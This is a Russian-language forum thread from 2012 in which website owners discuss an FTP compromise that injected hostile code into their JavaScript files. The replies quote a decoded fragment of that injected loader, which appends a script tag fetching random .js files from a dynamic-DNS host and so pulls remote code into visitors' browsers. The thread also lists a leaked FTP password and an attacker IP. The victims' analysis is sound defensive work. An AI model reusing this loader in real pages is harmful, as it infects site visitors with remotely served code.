https://mobile.opennet.me/openforum/vsluhforumID10/5023.html Ubuntu server 9.10 + vsftpd 2.2.0-1<br><br>Сегодня утром просматривая отчёты logwatch, заметил что кто-то, каким-то образом подобрал пароль на наш ftp (пароль был f2t3p4!) и заменил все .js файлы на свои.<br><br>.js файлы лежали в то числе в Driver Pack Solution.<br><br>Оригинальный файл DRPSu12\tools\modules\resize.js<br>----------------------------------------------------------------<br>// On change size of the window<br>try {<br>self.resizeTo(width,height - 25);<br>self.moveTo((screen.width / 2) - (width / 2), (screen.height / 2) - (height / 2));<br>//if (screen.width==640){<br>if ((screen.width&lt;width)&#124;&#124;(screen.height&lt;height)){<br>self.resizeTo(800,600 - 25);<br>self.moveTo(0,0);<br>window.attachEvent('onload',function(){tooglePanel();});<br>}<br>//if (screen.height&lt;height){ //On netbooks<br>//window.attachEvent('onload',function(){<br>//self.resizeTo(width,$(window).height() - 25);<br>//var callWidth = (screen.width / 2) - ($(window).width() / 2) - 23;<br>//var callHeight = (screen.height / 2) - (($(window).height()+80) / https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#11 Thu, 17 May 2012 00:37:23 GMT &gt; Числит сайт от этой хрени (кстати, появилась она с месяц назад, и <br>&gt; вирусы её не ловили и пропускали как нормальный код) - все <br>&gt; js перезаписала в конец. Код динамический в середине - начало и <br>&gt; конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о <br>&gt; вирусах на сайте вручную слил весь сайт и ручками поудалял этот <br>&gt; код. Собственно, к чему это все :) Проблема не один раз <br>&gt; почистить - а понять, как он туда попадает и предотвратить. Доступа <br>&gt; прямого ни у кого нет, пароль отдельно от FTP клиента хранится? <br><br>нужно смотреть на дату изменения файлов (тут вы уже пролетели, конечно) и в логи (http, ftp) в которых искать, что было во в то время, когда менялись файлы.<br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#10 Wed, 16 May 2012 16:39:34 GMT Числит сайт от этой хрени (кстати, появилась она с месяц назад, и вирусы её не ловили и пропускали как нормальный код) - все js перезаписала в конец. Код динамический в середине - начало и конец одинаковые, автозамена не прокатила. В итоге после очередного сообщения о вирусах на сайте вручную слил весь сайт и ручками поудалял этот код. Собственно, к чему это все :) Проблема не один раз почистить - а понять, как он туда попадает и предотвратить. Доступа прямого ни у кого нет, пароль отдельно от FTP клиента хранится?<br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#9 Mon, 16 Apr 2012 08:42:51 GMT &gt;[оверквотинг удален]<br>&gt; на официальном сайте FIRE ZILLA в данный момент нет никаких наводок <br>&gt; на этот сервис, да и вообще о портатиыной версии ВООБЩЕ!<br>&gt; после этого удалил ее нахер и скачал с ОпенФортча по ссылке с <br>&gt; офсайта FIRE ZILLA!<br>&gt; давайте копать наконец то!<br>&gt; загвостка гдето на носу!<br>&gt; и кстати той утилитой по удалению подобного кода невозможно удалить динамический код. <br>&gt; а у меня этот вирус сделал динамику в содержимом, ява скриптов у <br>&gt; меня около 100 шт на сервере, мне пришлось потратить более часа <br>&gt; на его чистку((((( <br><br>У меня фтп не на хостинге, а на корпораитвном сервере.<br>На сервере стоит fail2ban, denyhost. Попыток подбора паролей не было. Судя по логам был сразу вход. ФТПшником пользуются несколько сотрудников. Я подозреваю, что кто-то из них заразился вирусом и вирус вытащил сохранённые пароли от ФТП<br><br>В логах сохранился IP взломщика: 50.115.122.28<br>Написал abuse по хуизу, ответили:<br><br>==========================================================<br>abuse@midphase.com <br>Hello,<br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#8 Sun, 15 Apr 2012 18:30:13 GMT &gt;[оверквотинг удален]<br>&gt; время (дата обновления файлов на каждом сайте отличается всего на 1-2 <br>&gt; мин), а вот на втором хостинге раньше на 1 день. Получается, <br>&gt; что заражали сразу целыми хостингами.<br>&gt; Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной <br>&gt; копии на локальном комьютере, но вот заражение мне кажется было не <br>&gt; через FTP сайта, а непосредственно на сервере провайдера.<br>&gt; Кстати вот здесь есть скрипт, который вроде как лечит данную проблему: <br>&gt; https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d2a1f6b82ceb9 <br>&gt; (сам я его не запускал, обновил всё через верезрвную копию, но возможно <br>&gt; кому-то пригодиться.) <br><br>ПОЧЕМУ вы не постучались? (совершенно случайно второй раз попал на этот сайт из за вашего неответа! чуть не потерял с вами контакт) давайте решим эту проблему. ею все больше и большн заражаются разработчики и не знают в чем дело, т.к коды разные, но схема одна!!! все даты идут на 12 число!!! хотя софт и сервер у мене не менялись годами! https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#7 Sat, 14 Apr 2012 19:04:59 GMT Ваш хостинг точно тут не причем, потому, что у меня заразились аналогичным вирусом сразу 5 разных сайтов. при этом они расположены на 2 разных хостингах.<br>Заражение всех сайтов на одном хостинге произошло примерно в одно и тоже время (дата обновления файлов на каждом сайте отличается всего на 1-2 мин), а вот на втором хостинге раньше на 1 день. Получается, что заражали сразу целыми хостингами.<br><br>Восстановить работоспособность сайтов удалось сразу, путем обновления файлов из резервной копии на локальном комьютере, но вот заражение мне кажется было не через FTP сайта, а непосредственно на сервере провайдера. <br>Кстати вот здесь есть скрипт, который вроде как лечит данную проблему:<br>https://gist.github.com/2359497/efb3d61a97231abdaa746ce8981d2a1f6b82ceb9<br>(сам я его не запускал, обновил всё через верезрвную копию, но возможно кому-то пригодиться.)<br><br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#6 Fri, 13 Apr 2012 21:30:04 GMT ЗДРАВСТВУЙТЕ!<br>СРОЧНО ОБЪЕДЕНЯЕМСЯ!!!<br>у меня тоже в ява кодах точно такой код на сайте<br>заметил примерно в то же время 12-13 апреля 2012 года.<br>давайте копать!!! <br><br>ВОТ МОИ КОНТАКТЫ: <br>IСИQ: 55-99-8-ноль<br>e_mail: freepainte(собчак)yandex.ru<br><br>Доступ ftp никому не довал<br>Хостинг: IHC.ru (намек на него)<br><br>Если узнаем кто это делает, то попробуем потрясти его хорошенько!<br>Прикинь, если это хостинг! )) вот мы его на бабки раскрутим!<br><br>в общем давай копать. жду!<br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#5 Fri, 13 Apr 2012 12:46:23 GMT чем-чем, заменил e() в конце каким ни то print-ом.<br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#4 Fri, 13 Apr 2012 12:41:19 GMT &gt;[оверквотинг удален]<br>&gt; } <br>&gt; }; <br>&gt; script.onload = function() { <br>&gt; window.xyzflag = 2; <br>&gt; }; <br>&gt; script.src = url + Math.random().toString().substring(3) + '.js'; <br>&gt; head.appendChild(script); <br>&gt; } <br>&gt; }; <br>&gt; })(); <br><br>Чем, если не секрет раскрыли бинарник?<br> https://mobile.opennet.me/openforum/vsluhforumID10/5023.html#3 Thu, 12 Apr 2012 11:32:26 GMT &gt;&gt;&gt; Как видно, добавлен приличный кусок кода, Я догадываюсь, что это зашифрованное выполнение <br>&gt;&gt;&gt; какой-то команды, но хотелось бы понять чего хотел взломщик? Расшифруйте, пожалуйста, <br>&gt;&gt;&gt; кто может?<br>&gt;&gt; Вот что: <br>&gt;&gt; (function() { <br>&gt;&gt; var url = 'http://6ywcxns.vugrtrilro.selfip.com/g/'; <br>&gt;&gt; if (typeof window.xyzflag === 'undefined') { <br>&gt; Спасибо, ещё больше ничего не понятно. :) <br><br>Че не понятно то? В страничку внедряется нечто скачиваемое с http://6ywcxns.vugrtrilro.selfip.com/g<br>